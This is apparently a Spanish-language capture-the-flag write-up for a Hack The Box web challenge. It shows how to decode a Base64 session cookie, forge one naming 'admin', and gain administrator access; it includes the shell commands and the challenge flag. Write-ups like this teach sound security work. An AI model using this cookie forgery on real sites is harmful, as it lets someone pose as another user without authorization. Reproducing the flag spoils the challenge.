baby auth

Se nos proporciona esta página web:

Primero, nos podemos registrar (nombre asdf, por ejemplo):

Luego, nos dicen que no somos admin. De hecho, la autenticación se gestiona con cookies de sesión:

La cookie se sesión parece codificada en Base64, por lo que vamos a decodificarla (cuidado con la codificación de URL):

$ echo eyJ1c2VybmFtZSI6ImFzZGYifQ== | base64 -d
{"username":"asdf"}

Muestra nuestro nombre de usuario, a lo mejor podemos modificar la cookie y ganar acceso como admin:

$ echo -n '{"username":"admin"}' | base64
eyJ1c2VybmFtZSI6ImFkbWluIn0=

Si el servidor es vulnerable, al refrescar la página la cookie le dirá al servidor que somos admin. Y ahí tenemos la flag:

HTB{s3ss10n_1nt3grity_1s_0v3r4tt3d_4nyw4ys}